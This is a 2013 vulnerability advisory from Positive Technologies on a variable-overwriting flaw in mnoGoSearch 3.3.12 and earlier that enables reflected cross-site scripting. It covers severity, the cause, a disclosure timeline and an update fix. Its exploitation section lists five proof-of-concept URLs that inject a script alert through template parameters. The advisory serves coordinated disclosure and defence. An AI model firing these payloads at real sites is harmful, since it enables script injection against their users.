PT-2013-18: Variables Overwriting in mnoGoSearch
Vulnerable software
mnoGoSearch
Version: 3.3.12 and earlier
Application link:
http://www.mnogosearch.org/
Severity level
Severity level: Medium
Impact: Cross-Site Scripting (XSS)
Access Vector: Remote
CVSS v2:
Base Score: 4.3
Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N)
CVE: not assigned
Software description
mnoGoSearch is a universal Intranet and Internet search engine.
Vulnerability description
Positive Technologies experts have detected a Cross-Site Scripting vulnerability in mnoGoSearch.
Due to incorrect application architecture, all the template variables and variables sent by the client are stored in the same list. This vulnerability allows attackers to overwrite any uninitialized variables used in the template. Overwriting parameters, which are displayed on the web page without processing, results in multiple cross-site scripting vulnerabilities.
Exploitation example
http://www.mnogosearch.org/search/index.html?q=x&STORED=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
http://www.mnogosearch.org/search/index.html?q=x&CL=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
http://www.mnogosearch.org/search/index.html?q=a&cc=1&Charset=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
http://www.mnogosearch.org/search/index.html?q=a&ResultContentType=text/html%0A%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
http://www.mnogosearch.org/search/index.html?q=aaa&total=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E&a=a
How to fix
Update your software up to the latest version.
Advisory status
15.02.2013 - Vendor gets vulnerability details
01.03.2013 - Vendor releases fixed version and details
05.03.2013 - Public disclosure
Credits
The vulnerabilities has discovered by Sergey Bobrov, Positive Research Center (Positive Technologies Company)
References
http://en.securitylab.ru/lab/PT-2013-18
http://www.mnogosearch.org/bugs/index.php?id=4819
Reports on the vulnerabilities previously discovered by Positive Research:
http://ptsecurity.com/research/advisory/
http://en.securitylab.ru/lab/